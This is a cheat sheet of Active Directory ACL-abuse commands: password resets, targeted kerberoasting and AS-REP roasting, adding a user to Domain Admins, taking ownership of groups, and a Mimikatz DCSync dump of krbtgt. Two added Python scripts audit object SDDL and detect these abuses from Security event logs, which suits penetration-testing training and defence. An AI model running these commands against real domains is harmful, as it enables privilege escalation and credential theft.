ACL Abuse

GenericAll on User

If we have GenericAll rights over a user object we can:

  1. Change that user's password:

net user <username> <password> /domain

  2. Set up targeted Kerberoasting: set an SPN on the account so it becomes kerberoastable, request the service ticket and crack the hash offline

  • First set an SPN on that user object

Set-DomainObject -Credential $creds -Identity <username> -Set @{serviceprincipalname="fake/NOTHING"}

  • Then get the hash and crack it

Rubeus.exe kerberoast /outfile:targetedhashes.txt
john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\targetedhashes.txt

  3. Set up targeted AS-REP roasting: disable Kerberos pre-authentication on the user (4194304 = 0x400000, the DONT_REQ_PREAUTH flag), AS-REP roast it and crack the hash offline

Set-DomainObject -Identity <username> -XOR @{UserAccountControl=4194304}

GenericAll on Group

If we have GenericAll rights on a group, for example Domain Admins, we can:

  1. Add ourselves to that group:

net group "Domain Admins" myuser /add /domain

GenericWrite / WriteProperty on Computer

If we have GenericWrite or WriteProperty on a domain computer object we can set up Resource-Based Constrained Delegation to that computer and then access it. See the Resource-Based-Constrained-Delegation.md section.

WriteProperty on Group

If our controlled user has the WriteProperty right on all properties of the Domain Admins group, we can again add ourselves to the Domain Admins group and escalate privileges:

Add-NetGroupUser -UserName myuser -GroupName "Domain Admins" -Domain "offense.local"

Self-Membership on Group

If our user has the Self-Membership right on a group we can add ourselves (and only ourselves) to that group:

Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"

WriteProperty on Group (net.exe)

If our user has the WriteProperty right on a group, we can also add ourselves with the built-in net command:

net group "domain admins" spotless /add /domain

ForceChangePassword on User

If we have the User-Force-Change-Password extended right on a user object, we can reset that user's password without knowing the current one:

  • Using PowerView (prompts for the new password, since -AccountPassword is omitted)

Set-DomainUserPassword -Identity targetuser -Verbose

  • Another method, supplying the password from a credential object

$c = Get-Credential
Set-DomainUserPassword -Identity targetuser -AccountPassword $c.Password -Verbose

WriteOwner on Group

If a user in our control has WriteOwner on a group, we can change the group's owner to our user; as owner we can then modify the DACL and grant ourselves further rights. In the example below the SID is that of the Domain Admins group (RID 512):

Set-DomainObjectOwner -Identity S-1-5-21-2552734371-813931464-1050690807-512 -OwnerIdentity "ouruser" -Verbose

GenericWrite on Group

This allows us to add users (ourselves, for example) as members of the group:

# Create creds
$pwd = ConvertTo-SecureString 'JustAWeirdPwd!$' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('DOMAIN\username', $pwd)
# Add user to group
Add-DomainGroupMember -Credential $creds -Identity 'Group Name' -Members 'username' -Verbose
# Check user was added
Get-DomainGroupMember -Identity "Group Name" | Select MemberName
# Remove group member
Remove-DomainGroupMember -Credential $creds -Identity "Group Name" -Members 'username' -Verbose
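
Every right above is an ACE on the target object, so the same list doubles as an audit checklist. The following Python script is an added example, not from this page or from PowerView: it parses the SDDL of an AD object, such as the string returned by (Get-Acl "AD:\CN=Domain Admins,CN=Users,DC=corp,DC=local").Sddl with the ActiveDirectory module loaded, and reports every allow ACE that grants one of these rights (GenericAll, GenericWrite, WriteDacl, WriteOwner, WriteProperty, Self-Membership, ForceChangePassword, the DCSync replication rights) to a principal outside an assumed trusted set. The SDDL it runs on is constructed for the example; the trusted-principal list is an assumption to adjust per environment; the GUIDs are the schema values for the member attribute and the three extended rights named.

```python
"""Audit one AD object's SDDL for the abusable rights described above.
Added example, not from the page or PowerView. Input assumption: an SDDL
string as returned by (Get-Acl "AD:\\<DN>").Sddl. The sample SDDL is constructed."""
import re

# ADS_RIGHT_* access-mask bits behind the two-letter SDDL rights tokens.
SDDL_RIGHTS = {
    "GA": 0x10000000, "GR": 0x80000000, "GW": 0x40000000, "GX": 0x20000000,
    "RC": 0x00020000, "SD": 0x00010000, "WD": 0x00040000, "WO": 0x00080000,
    "CC": 0x1, "DC": 0x2, "LC": 0x4, "SW": 0x8, "RP": 0x10, "WP": 0x20,
    "DT": 0x40, "LO": 0x80, "CR": 0x100,
}
GENERIC_ALL, GENERIC_WRITE, WRITE_DAC, WRITE_OWNER = 0x10000000, 0x40000000, 0x40000, 0x80000
DS_SELF, DS_WRITE_PROP, DS_CONTROL_ACCESS = 0x8, 0x20, 0x100

# Schema GUIDs for the attribute and extended rights this page discusses.
MEMBER_ATTR = "bf9679c0-0de6-11d0-a285-00aa003049e2"
EXTENDED_RIGHTS = {
    "00299570-246d-11d0-a768-00aa006e0529": "ForceChangePassword",
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
# Assumption: principals expected to hold these rights; tune per environment.
TRUSTED_ALIASES = {"SY", "BA", "DA", "EA", "SA", "ED", "DD", "PS"}
TRUSTED_SIDS = {"S-1-5-18", "S-1-5-32-544", "S-1-5-9", "S-1-5-10"}
TRUSTED_RIDS = {512, 516, 518, 519}  # Domain Admins, Domain Controllers, Schema Admins, Enterprise Admins
ACE_RE = re.compile(r"\(([^)]*)\)")


def parse_rights(token):
    """Convert the SDDL rights field (hex or two-letter tokens) to an access mask."""
    if token.lower().startswith("0x"):
        return int(token, 16)
    mask = 0
    for i in range(0, len(token), 2):
        pair = token[i:i + 2]
        if pair not in SDDL_RIGHTS:
            raise ValueError(f"unknown SDDL rights token {pair!r}")
        mask |= SDDL_RIGHTS[pair]
    return mask


def is_trusted(trustee):
    if trustee in TRUSTED_ALIASES or trustee in TRUSTED_SIDS:
        return True
    if trustee.startswith("S-1-5-21-"):
        return int(trustee.rsplit("-", 1)[1]) in TRUSTED_RIDS
    return False


def abusable_rights(mask, object_guid):
    """Name the rights in one allow ACE that this page treats as abusable."""
    guid = object_guid.lower()
    hits = []
    if mask & GENERIC_ALL:
        hits.append("GenericAll")
    if mask & GENERIC_WRITE:
        hits.append("GenericWrite")
    if mask & WRITE_DAC:
        hits.append("WriteDacl")
    if mask & WRITE_OWNER:
        hits.append("WriteOwner")
    if mask & DS_WRITE_PROP:  # empty GUID = every property, member GUID = group membership
        hits.append("WriteProperty(member)" if guid == MEMBER_ATTR else f"WriteProperty({guid or 'all'})")
    if mask & DS_SELF and guid in ("", MEMBER_ATTR):  # validated write on member = Self-Membership
        hits.append("Self-Membership" if guid else "Self(all)")
    if mask & DS_CONTROL_ACCESS:  # empty GUID = all extended rights, including the three above
        hits.append(EXTENDED_RIGHTS.get(guid, f"ExtendedRight({guid or 'all'})"))
    return hits


def triage_sddl(sddl):
    """Return the allow ACEs that grant abusable rights to untrusted principals."""
    findings = []
    for body in ACE_RE.findall(sddl):
        fields = body.split(";")
        if len(fields) < 6:
            continue
        ace_type, _flags, rights, object_guid, _inherit_guid, trustee = fields[:6]
        if ace_type not in ("A", "OA") or is_trusted(trustee):  # deny/audit ACEs grant nothing
            continue
        hits = abusable_rights(parse_rights(rights), object_guid)
        if hits:
            findings.append({"trustee": trustee, "rights": hits})
    return findings


# Constructed DACL: full control for SYSTEM and Domain Admins, read for
# Authenticated Users, then five ACEs handed to ordinary domain accounts.
DOMAIN = "S-1-5-21-1004336348-1177238915-682003330"
SAMPLE_SDDL = (
    "O:DAG:DAD:AI"
    "(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;SY)"
    "(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)"
    "(A;;RPLCLORC;;;AU)"
    f"(A;;GA;;;{DOMAIN}-1104)"
    f"(OA;;WP;{MEMBER_ATTR};;{DOMAIN}-1105)"
    f"(OA;;CR;00299570-246d-11d0-a768-00aa006e0529;;{DOMAIN}-1106)"
    f"(OA;;SW;{MEMBER_ATTR};;{DOMAIN}-1107)"
    f"(A;;WO;;;{DOMAIN}-1108)"
    f"(D;;GA;;;{DOMAIN}-1109)"
)

if __name__ == "__main__":
    for f in triage_sddl(SAMPLE_SDDL):
        print(f"{f['trustee']}: {', '.join(f['rights'])}")
```

Run over a real object the script flags the same five situations this page abuses (RIDs 1104 to 1108 in the sample); the deny ACE on RID 1109 and the read-only ACE for Authenticated Users are ignored. Inherited ACEs come out the same way, so a finding on one group usually points back to an ACE on its parent OU.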

DCSync

If we have DCSync rights (the directory replication extended rights on the domain object) we can use Mimikatz to dump the password hashes of any user or computer object, for example krbtgt:

Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
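
Each abuse on this page leaves a record in the domain controller's Security log: 4724 for a password reset, 4738 for a userAccountControl change such as disabling pre-authentication, 4728/4732/4756 for a member added to a group, 5136 for an attribute write such as a new servicePrincipalName or a modified nTSecurityDescriptor (needs the Audit Directory Service Changes subcategory and a SACL on the object), and 4662 carrying the DS-Replication-Get-Changes GUIDs for DCSync (needs Audit Directory Service Access). The following Python is an added example, not from this page: a small rule set run over constructed event records. The records are dicts keyed by the EventData field names of the real events; the UserAccountControl value is assumed to be the rendered text rather than the raw %% codes, and the helpdesk and replication allowlists are placeholders for the environment's own.

```python
"""Detection rules for the ACL abuses above, run over Security event records.
Added example, not from the page. Records are constructed dicts keyed by the
EventData field names of events 4724, 4738, 4728, 4662 and 5136."""

REPLICATION_GUIDS = (
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
)
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Schema Admins", "Administrators"}
GROUP_ADD_EVENTS = {4728, 4732, 4756}  # member added to global / local / universal group
# Placeholders: accounts expected to reset passwords or replicate in this environment.
HELPDESK_ALLOWLIST = {"helpdesk01"}
REPLICATION_ALLOWLIST = {"svc_dirsync"}


def detect(events):
    """Return one alert per suspicious record; benign records yield nothing."""
    alerts = []
    for e in events:
        eid, subject = e["EventID"], e.get("SubjectUserName", "")
        target, rule = e.get("TargetUserName", ""), None
        attr = e.get("AttributeLDAPDisplayName")
        if eid == 5136 and attr == "servicePrincipalName" and e.get("OperationType") == "Value Added":
            rule, target = "spn-added-targeted-kerberoast-setup", e["ObjectDN"]
        elif eid == 5136 and attr == "nTSecurityDescriptor":
            rule, target = "owner-or-dacl-modified", e["ObjectDN"]
        elif eid == 4738 and "'Don't Require Preauth' - Enabled" in e.get("UserAccountControl", ""):
            rule = "preauth-disabled-asrep-roast-setup"
        elif eid == 4724 and subject not in HELPDESK_ALLOWLIST:
            rule = "password-reset-by-unexpected-account"
        elif eid in GROUP_ADD_EVENTS and target in PRIVILEGED_GROUPS:
            rule, target = "member-added-to-privileged-group", f"{e['MemberName']} -> {target}"
        elif (eid == 4662 and any(g in e.get("Properties", "").lower() for g in REPLICATION_GUIDS)
              and not subject.endswith("$") and subject not in REPLICATION_ALLOWLIST):
            rule = "dcsync-replication-request"  # DCs replicate with machine accounts, users do not
        if rule:
            alerts.append({"rule": rule, "subject": subject, "target": target})
    return alerts


# Constructed records following the sequence of abuses on this page, plus two benign ones.
SAMPLE_EVENTS = [
    {"EventID": 5136, "SubjectUserName": "spotless", "ObjectDN": "CN=svc-backup,CN=Users,DC=offense,DC=local",
     "AttributeLDAPDisplayName": "servicePrincipalName", "AttributeValue": "fake/NOTHING",
     "OperationType": "Value Added"},
    {"EventID": 4738, "SubjectUserName": "spotless", "TargetUserName": "svc-backup",
     "UserAccountControl": "'Don't Require Preauth' - Enabled"},
    {"EventID": 4724, "SubjectUserName": "spotless", "TargetUserName": "svc-backup"},
    {"EventID": 4724, "SubjectUserName": "helpdesk01", "TargetUserName": "jdoe"},  # benign
    {"EventID": 4728, "SubjectUserName": "spotless", "TargetUserName": "Domain Admins",
     "MemberName": "CN=spotless,CN=Users,DC=offense,DC=local"},
    {"EventID": 5136, "SubjectUserName": "spotless", "ObjectDN": "CN=Domain Admins,CN=Users,DC=offense,DC=local",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor", "OperationType": "Value Added"},
    {"EventID": 4662, "SubjectUserName": "spotless", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "DC01$", "AccessMask": "0x100",  # benign: DC-to-DC replication
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"{a['rule']}: {a['subject']} -> {a['target']}")
```

The rules are deliberately per-event; in practice the strongest signal is the same subject account tripping several of them within minutes, which is exactly the sequence the sample reproduces.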
